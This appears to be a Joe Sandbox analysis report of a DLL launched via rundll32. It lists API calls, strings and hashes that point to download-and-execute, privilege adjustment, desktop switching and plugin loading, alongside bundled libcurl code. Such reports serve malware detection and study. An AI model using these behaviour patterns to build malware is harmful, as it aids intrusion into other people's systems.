                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                    • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                    • API String ID: 3698121176-3819984048
                    • Opcode ID: 712239165e02dc8b7bdb65662e4b0732b74361e396a09b1750fa52f45620062b
                    • Instruction ID: 4d21b4754830fb515f409aec351cd72125a3fcf82feee0298b769b12d91b8405
                    • Opcode Fuzzy Hash: 712239165e02dc8b7bdb65662e4b0732b74361e396a09b1750fa52f45620062b
                    • Instruction Fuzzy Hash: CF3195709003119FEB119FB7EC4AA573FB0EBC0726701172AE5848319AEB38AC16CF94
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: CreateErrorEventLast
                    • String ID: $Q$Time-out$WSACloseEvent failed (%d)$WSACreateEvent failed (%d)$WSAEnumNetworkEvents failed (%d)
                    • API String ID: 545576003-2343531540
                    • Opcode ID: 6cfdc4861f8aaa264383a94b44a11b723b770b4c66beb97af600f2daa6f03fca
                    • Instruction ID: cf29ceeab4ad33efbb2712f9dd87d5b2102658ad7f3b5aaca46b783f60ab1d11
                    • Opcode Fuzzy Hash: 6cfdc4861f8aaa264383a94b44a11b723b770b4c66beb97af600f2daa6f03fca
                    • Instruction Fuzzy Hash: 41E1CF715093429BF3019B24C844BAABBF4FFC6318F50462DF9989B291D7B69C45CBE2
                    APIs
                    • LoadLibraryA.KERNEL32(ADVAPI32.dll), ref: 04EC327E
                    • GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 04EC3292
                    • GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 04EC329D
                    • GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueA), ref: 04EC32A8
                    • LoadLibraryA.KERNEL32(kernel32.dll), ref: 04EC32B2
                    • GetProcAddress.KERNEL32(00000000,GetCurrentProcess), ref: 04EC32C1
                    • LoadLibraryA.KERNEL32(KERNEL32.dll), ref: 04EC331B
                    • GetProcAddress.KERNEL32(00000000,GetLastError), ref: 04EC3327
                    • CloseHandle.KERNEL32(?), ref: 04EC3337
                    • FreeLibrary.KERNEL32(00000000), ref: 04EC3348
                    • FreeLibrary.KERNEL32(?), ref: 04EC3352
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: AddressLibraryProc$Load$Free$CloseHandle
                    • String ID: ADVAPI32.dll$AdjustTokenPrivileges$GetCurrentProcess$GetLastError$KERNEL32.dll$LookupPrivilegeValueA$OpenProcessToken$SeShutdownPrivilege$kernel32.dll
                    • API String ID: 2887716753-2040270271
                    • Opcode ID: b9791fe387f2bcbf0caf64f7d72ca69d7d9319c92e50b995a46c1d6c2c4e2729
                    • Instruction ID: a1c76cf9790dc8b1155bc4e04e3984c10c86979616b1ad19677f6ee64a039160
                    • Opcode Fuzzy Hash: b9791fe387f2bcbf0caf64f7d72ca69d7d9319c92e50b995a46c1d6c2c4e2729
                    • Instruction Fuzzy Hash: D8319871E40318AFDB14ABF59D4AFAFBBB8EF48701F005059E901F7240CA74A9058FA0
                    APIs
                    • LoadLibraryA.KERNEL32(?,?,00000000,00000000,00000000), ref: 04EC38A8
                    • GetProcAddress.KERNEL32(00000000), ref: 04EC38B1
                    • LoadLibraryA.KERNEL32(Advapi32.dll,?), ref: 04EC38E4
                    • GetProcAddress.KERNEL32(00000000), ref: 04EC38E7
                    • LoadLibraryA.KERNEL32(Advapi32.dll,?), ref: 04EC3902
                    • GetProcAddress.KERNEL32(00000000), ref: 04EC3905
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: Advapi32.dll$Allo$AndI$Chec$Free$Sid$aliz$cate$eSid$enMe$kTok$mber$niti$ship
                    • API String ID: 2574300362-3168299024
                    • Opcode ID: dd4ee105eb0b07f7de73d363445292c62bf92bd984de6633e37263d24922b8ff
                    • Instruction ID: b2e3058e9eddb8ec8abccdd14481c531a66bd7480e233e4c6b75c9736e4c4e4e
                    • Opcode Fuzzy Hash: dd4ee105eb0b07f7de73d363445292c62bf92bd984de6633e37263d24922b8ff
                    • Instruction Fuzzy Hash: 7831F0B2D0131CABCB10DFE9D985AEEBBB8FF48700F108519E505AB244DAB45A05CFA5
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: _memset$_strrchrlstrcat$EnvironmentExpandStringswsprintf
                    • String ID: "%1$%s\shell\open\command$D$WinSta0\Default
                    • API String ID: 609515672-33419044
                    • Opcode ID: a887338a40dceb297399aee63f021db6d48cc4fe0ab19504e524017298b6d7b8
                    • Instruction ID: 3f42463c7235491de30ec70949b38ab683cf53238d70ccb5344d0ed5c77cc480
                    • Opcode Fuzzy Hash: a887338a40dceb297399aee63f021db6d48cc4fe0ab19504e524017298b6d7b8
                    • Instruction Fuzzy Hash: A651FB7194032CBBEB25DB60DD46FDB77B89F04B09F4051D8EA49AA180EA70B745CF91
                    APIs
                    • DeleteFileA.KERNEL32(04EC5B63,00000000,00000001,?), ref: 04EC6FA9
                    • LoadLibraryA.KERNEL32(wininet.dll), ref: 04EC6FC2
                    • GetProcAddress.KERNEL32(00000000,InternetOpenA), ref: 04EC6FD6
                    • FreeLibrary.KERNEL32(00000000), ref: 04EC6FF4
                    • GetProcAddress.KERNEL32(00000000,InternetOpenUrlA), ref: 04EC7013
                    • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 04EC7046
                    • _memset.LIBCMT ref: 04EC706E
                    • GetProcAddress.KERNEL32(00000000,InternetReadFile), ref: 04EC707C
                    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 04EC70B2
                    • CloseHandle.KERNEL32(?), ref: 04EC70C8
                    • Sleep.KERNEL32(00000001), ref: 04EC70D0
                    • GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 04EC70DC
                    • FreeLibrary.KERNEL32(00000000), ref: 04EC70F1
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: AddressProc$FileLibrary$Free$CloseCreateDeleteHandleLoadSleepWrite_memset
                    • String ID: InternetCloseHandle$InternetOpenA$InternetOpenUrlA$InternetReadFile$MSIE 6.0$wininet.dll
                    • API String ID: 455779405-4269851202
                    • Opcode ID: b617d38fbf97356bf59f5847fa909d153dfc290936f39d0c54fa1c8da53b307a
                    • Instruction ID: 05a26d845177b3e1aba0e30e51c7ada408bdeb1768ad389734cc6ee25138ed2a
                    • Opcode Fuzzy Hash: b617d38fbf97356bf59f5847fa909d153dfc290936f39d0c54fa1c8da53b307a
                    • Instruction Fuzzy Hash: D84186F1640218AFD7209BA5DD86FDE73BCEF44705F1041A9F705A7141CA746E468FA8
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID: %s auth using %s with user '%s'$%s:%s$%sAuthorization: Basic %s$AWS_SIGV4$Authorization$Authorization: Bearer %s$Basic$Bearer$Digest$NTLM$Negotiate$Proxy$Proxy-$Proxy-authorization$Server
                    • API String ID: 0-3819500859
                    • Opcode ID: 04e623dbf09301f1a13206f1723b878d66a705c38753ea1a8317d736c110e7df
                    • Instruction ID: 9881b2655aa3de643f9af9829eb454d148cfee0503907fe0e8314c807ff6c3a6
                    • Opcode Fuzzy Hash: 04e623dbf09301f1a13206f1723b878d66a705c38753ea1a8317d736c110e7df
                    • Instruction Fuzzy Hash: 0981D53560C3069BF7109BA8DC00B7B77E5EF85354F84052EE958D7242E732E9098BD2
                    APIs
                      • Part of subcall function 6D03B400: GetModuleHandleA.KERNEL32(ntdll,RtlVerifyVersionInfo,00000000,?), ref: 6D03B42E
                      • Part of subcall function 6D03B400: GetProcAddress.KERNEL32(00000000), ref: 6D03B435
                    • GetModuleHandleA.KERNEL32(ntdll,wine_get_version,?,?,?,?,?,?,00000000,?), ref: 6D01F5C8
                    • GetProcAddress.KERNEL32(00000000), ref: 6D01F5CF
                      • Part of subcall function 6D03B400: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,?), ref: 6D03B501
                      • Part of subcall function 6D03B400: VerSetConditionMask.KERNEL32(00000000,?,00000001,?), ref: 6D03B50B
                      • Part of subcall function 6D03B400: VerSetConditionMask.KERNEL32(00000000,?,00000010,?,?,00000020,?,?,00000001,?), ref: 6D03B528
                      • Part of subcall function 6D03B400: VerSetConditionMask.KERNEL32(00000000,?,00000008,00000001,?,00000010,?,?,00000020,?,?,00000001,?), ref: 6D03B534
                    Strings
                    • schannel: using IP address, SNI is not supported by OS., xrefs: 6D01F6F9
                    • schannel: initial InitializeSecurityContext failed: %s, xrefs: 6D01F8EC, 6D01F91C
                    • Error setting ALPN, xrefs: 6D01F734
                    • schannel: failed to send initial handshake data: sent %zd of %lu bytes, xrefs: 6D01F993
                    • schannel: this version of Windows is too old to support certificate verification via CA bundle file., xrefs: 6D01F9A8
                    • schannel: SNI or certificate check failed: %s, xrefs: 6D01F904
                    • ntdll, xrefs: 6D01F5C3
                    • ALPN: offers %s, xrefs: 6D01F7C5
                    • Failed to set SNI, xrefs: 6D01F695
                    • schannel: Windows version is old and may not be able to connect to some servers due to lack of SNI, algorithms, etc., xrefs: 6D01F5AA
                    • schannel: unable to allocate memory, xrefs: 6D01F863
                    • wine_get_version, xrefs: 6D01F5BE
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: ConditionMask$AddressHandleModuleProc
                    • String ID: ALPN: offers %s$Error setting ALPN$Failed to set SNI$ntdll$schannel: SNI or certificate check failed: %s$schannel: Windows version is old and may not be able to connect to some servers due to lack of SNI, algorithms, etc.$schannel: failed to send initial handshake data: sent %zd of %lu bytes$schannel: initial InitializeSecurityContext failed: %s$schannel: this version of Windows is too old to support certificate verification via CA bundle file.$schannel: unable to allocate memory$schannel: using IP address, SNI is not supported by OS.$wine_get_version
                    • API String ID: 3530165345-1248198160
                    • Opcode ID: 43c912adddca81702464b986e0b91cbe090633eaab1e56cf5988151781ae1e71
                    • Instruction ID: 586a753f187c04c01ba3ec0e13ce2d4aaf69cdb3fe6677b79235ac3daae73d9e
                    • Opcode Fuzzy Hash: 43c912adddca81702464b986e0b91cbe090633eaab1e56cf5988151781ae1e71
                    • Instruction Fuzzy Hash: 23C16DB2508345AFF710DF64CC44FABBBECBB85308F414829FA8597282D7B5D5548BA2
                    APIs
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D017FC3
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D01805B
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D01807E
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D018091
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D0180CF
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D01812D
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D018156
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D018169
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D0182AB
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D0182BA
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D0182DE
                    Strings
                    • %3I64d %s %3I64d %s %3I64d %s %s %s %s %s %s %s, xrefs: 6D0183C1
                    • ** Resuming transfer from byte position %I64d, xrefs: 6D017FEE
                    • %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed, xrefs: 6D018001
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                    • String ID: %3I64d %s %3I64d %s %3I64d %s %s %s %s %s %s %s$ %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed$** Resuming transfer from byte position %I64d
                    • API String ID: 885266447-664487449
                    • Opcode ID: 881ea4d27c42554b82551066d1db38d547f82f84feb7d47deca38dcf50fdde05
                    • Instruction ID: 405a59f9d4f45ecd80f5e59edba037a655f8302c3b9a8994deaa6e8d6cde19b2
                    • Opcode Fuzzy Hash: 881ea4d27c42554b82551066d1db38d547f82f84feb7d47deca38dcf50fdde05
                    • Instruction Fuzzy Hash: B0D14B71A0C745AFF7518AA4CD80FABB7E9FF89304F10492DFA9953251E735BA008B52
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID: %s\%s$ARPD$PluginMe$getDllName$isARDll$isCSDll
                    • API String ID: 0-3715897580
                    • Opcode ID: 64cf316849a0634f15edb8c1fd2c14dec9df895917a421249814fde391402654
                    • Instruction ID: a6ee8cbeff6635939b7fd568f42e18f921c90b896ab526f78d053ac1d1c6b828
                    • Opcode Fuzzy Hash: 64cf316849a0634f15edb8c1fd2c14dec9df895917a421249814fde391402654
                    • Instruction Fuzzy Hash: 17B11671D006149FEB20DBB49D41BEFB7B4AF44319F0056ECE549A7280EA71BE468F91
                    APIs
                    • LoadLibraryA.KERNEL32(user32.dll,1CA2304D), ref: 04EC33BA
                    • GetProcAddress.KERNEL32(00000000,GetThreadDesktop), ref: 04EC33D0
                    • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 04EC33DE
                    • GetProcAddress.KERNEL32(00000000,SetThreadDesktop), ref: 04EC33EC
                    • GetProcAddress.KERNEL32(00000000,CloseDesktop), ref: 04EC33FA
                    • LoadLibraryA.KERNEL32(kernel32.dll), ref: 04EC3407
                    • GetProcAddress.KERNEL32(00000000,GetCurrentThreadId), ref: 04EC3417
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: AddressProc$LibraryLoad
                    • String ID: CloseDesktop$GetCurrentThreadId$GetThreadDesktop$GetUserObjectInformationA$SetThreadDesktop$kernel32.dll$user32.dll
                    • API String ID: 2238633743-588083535
                    • Opcode ID: d2fa4d06167513a8e324ce731068c686c51e9f7f9f140b5a90f5c79801b342ad
                    • Instruction ID: e6be24443df40e404413646f2747cdf28a9f3cd71a12cd4f32109640c6f8d197
                    • Opcode Fuzzy Hash: d2fa4d06167513a8e324ce731068c686c51e9f7f9f140b5a90f5c79801b342ad
                    • Instruction Fuzzy Hash: EB311E71A40228AFDB15DF65DD85BEEBBB8FB48B14F00419AE909A7240DB746E41CF50
                    APIs
                    • CloseHandle.KERNEL32(?), ref: 6D03F8E1
                    • GetLastError.KERNEL32(?,00000100), ref: 6D03F926
                      • Part of subcall function 6D01A940: GetLastError.KERNEL32 ref: 6D01A9A5
                      • Part of subcall function 6D01A940: SetLastError.KERNEL32(00000000), ref: 6D01A9B0
                    • GetLastError.KERNEL32(?,00000100,?), ref: 6D03F774
                      • Part of subcall function 6D01A940: GetLastError.KERNEL32 ref: 6D01A943
                      • Part of subcall function 6D03F520: CryptQueryObject.CRYPT32(00000002,?,00000002,0000000E,00000000,00000000,?,00000000,00000000,00000000,?), ref: 6D03F601
                      • Part of subcall function 6D03F520: CertAddCertificateContextToStore.CRYPT32(?,?,00000004,00000000), ref: 6D03F622
                      • Part of subcall function 6D03F520: CertFreeCertificateContext.CRYPT32(00000000), ref: 6D03F62E
                      • Part of subcall function 6D03F520: GetLastError.KERNEL32(?,00000100), ref: 6D03F648
                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?), ref: 6D03F7B2
                    • GetLastError.KERNEL32(?,00000100), ref: 6D03F7CB
                    Strings
                    • schannel: invalid path name for CA file '%s': %s, xrefs: 6D03F782
                    • schannel: CA file exceeds max size of %u bytes, xrefs: 6D03F852
                    • schannel: failed to read from CA file '%s': %s, xrefs: 6D03F937
                    • schannel: failed to open CA file '%s': %s, xrefs: 6D03F7D9
                    • schannel: failed to determine size of CA file '%s': %s, xrefs: 6D03F821
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: ErrorLast$CertCertificateContext$CloseCreateCryptFileFreeHandleObjectQueryStore
                    • String ID: schannel: CA file exceeds max size of %u bytes$schannel: failed to determine size of CA file '%s': %s$schannel: failed to open CA file '%s': %s$schannel: failed to read from CA file '%s': %s$schannel: invalid path name for CA file '%s': %s
                    • API String ID: 2812708033-3430970913
                    • Opcode ID: ec4495367144c0a21e79fbfd7ba4ad69c4f44b08f09b94ae6e080c0a08f802d6
                    • Instruction ID: 0cf55f8c5d6e40d669b81311d6317d8fa064441f11656f4a1b0bba505cf20298
                    • Opcode Fuzzy Hash: ec4495367144c0a21e79fbfd7ba4ad69c4f44b08f09b94ae6e080c0a08f802d6
                    • Instruction Fuzzy Hash: 8751F3B2948312ABF7109B618C44FAB7BFCEB4A314F020529F649E7181DB74E504CBA6
                    APIs
                    • _strrchr.LIBCMT ref: 04EC5AD5
                    • _memset.LIBCMT ref: 04EC5AF2
                    • GetTempPathA.KERNEL32(00000104,00000000), ref: 04EC5B06
                    • _memset.LIBCMT ref: 04EC5B2C
                    • wsprintfA.USER32 ref: 04EC5B45
                    • GetFileAttributesA.KERNEL32(00000000), ref: 04EC5B75
                    • _memset.LIBCMT ref: 04EC5B8B
                    • Sleep.KERNEL32(000003E8), ref: 04EC5BAC
                    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 04EC5BD5
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: _memset$AttributesCreateFilePathProcessSleepTemp_strrchrwsprintf
                    • String ID: %s%s$D$WinSta0\Default
                    • API String ID: 1046919704-212261555
                    • Opcode ID: cbb6eb0e55a50f107b567210c96ee8a91741f003ff1e13c8da0d23fa8b6ec242
                    • Instruction ID: 5a5de70a7a59dbc4313c7b84aed660f2cfbfb8b8a63138b78aba987b5d6d16e7
                    • Opcode Fuzzy Hash: cbb6eb0e55a50f107b567210c96ee8a91741f003ff1e13c8da0d23fa8b6ec242
                    • Instruction Fuzzy Hash: 42410CB2900118ABEB24DB64DC89FEE7378EF45704F0041D8E749A7181DB757B4ACBA1
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID: %s%02x%02x$AAAA$CNAME: %s$Could not DoH-resolve: %s$DoH A: %u.%u.%u.%u$DoH AAAA: $DoH Host name: %s$DoH: %s type %s for %s$TTL: %u seconds$bad error code
                    • API String ID: 0-103626726
                    • Opcode ID: 1797202a1d4b25d6fb748d28ea27e732106be1ac429a6ce3bf2290b6d59fa067
                    • Instruction ID: 1c5a78c9c86314e1854fb5b7da8f10971f24d0b4919bf90c5c98ec3257fe5218
                    • Opcode Fuzzy Hash: 1797202a1d4b25d6fb748d28ea27e732106be1ac429a6ce3bf2290b6d59fa067
                    • Instruction Fuzzy Hash: 4DE1E6718083629FE720CF24CC84BABB7E4FF89304F06452CE9999B252D735A545CB9A
                    APIs
                    • send.WS2_32(?,?,00000006,00000000), ref: 6D02E64E
                    • WSAGetLastError.WS2_32 ref: 6D02E658
                    • send.WS2_32(?,?,?,00000000), ref: 6D02E6F3
                    • WSAGetLastError.WS2_32 ref: 6D02E6FD
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: ErrorLastsend
                    • String ID: %127[^,]%1[,]%127s$%c%c$%c%c%c%c$%c%c%c%c%s%c%c$%c%s$%c%s%c%s$Sending data failed (%d)
                    • API String ID: 1802528911-3533120981
                    • Opcode ID: eb0a6ddb77c0fe98497c8e560c5443a7947eba3191d2751c57d9b603f3712740
                    • Instruction ID: 3d04f9c9503d2111ffb603d41ba4b6cde766dc83a9f615e54a6ec3280ed24360
                    • Opcode Fuzzy Hash: eb0a6ddb77c0fe98497c8e560c5443a7947eba3191d2751c57d9b603f3712740
                    • Instruction Fuzzy Hash: 8E71C3726882467BF730CB24CC49FEB77ECAB85708F140529F68DEB182DB71A5048796
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: _strncpy
                    • String ID: %127[^= ]%*[ =]%255s$%hu%*[xX]%hu$BINARY$NEW_ENV$Syntax error in telnet option: %s$TTYPE$USER,%s$Unknown telnet option %s$XDISPLOC
                    • API String ID: 2961919466-748038847
